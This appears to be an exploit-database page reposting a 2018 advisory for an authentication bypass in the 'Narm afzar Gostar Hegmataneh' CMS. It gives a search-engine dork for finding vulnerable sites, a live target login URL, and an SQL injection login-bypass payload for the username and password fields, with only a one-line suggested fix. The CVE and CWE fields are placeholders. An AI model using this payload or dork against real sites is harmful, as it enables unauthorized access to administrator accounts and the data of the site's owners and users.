Advertisement






Narm afzar Gostar Hegmataneh cms Authentication bypass Vulnerability

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX Unknown Unknown
Author Risk Exploitation Type Date
Unknown Unknown Unknown 2018-07-11
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070117

Below is a copy:

Narm afzar Gostar Hegmataneh cms Authentication bypass Vulnerability
[+] Exploit Title ; Narm afzar Gostar Hegmataneh cms Authentication bypass Vulnerability

[+] Date : 2018-07-10

[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS

[+] Vendor HomePage : http://iran.behkima.ir

[+] Dork : intext:"Powered by Arash Zolfaghari  2014 and improvment by Narm afzar Gostar Hegmataneh"

[+] Version : ...

[+] Tested On : windows 10 - Deepin Os

[+] Contact : https://telegram.me/WebServer

[+] My Site : 0P3N3R .IR

[+] Description :

[!] Narm afzar Gostar Hegmataneh is a personal content management

[+] Poc :

[!] http://iran.behkima.ir/login.php

[!] Username And Password = ' /*!or*/1=1#


[+] Security Level :

[!]  High

[+] Exploitation Technique:

[!] Remote

[+] Request Method :

[!] POST

[+] Vulnerability Files :

[!] login.php

[+] Fix :

[!] Restrict user input or replace bad characters


[+] We Are :

[+] 0P3N3R [+] Ebrahim_Vaker

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.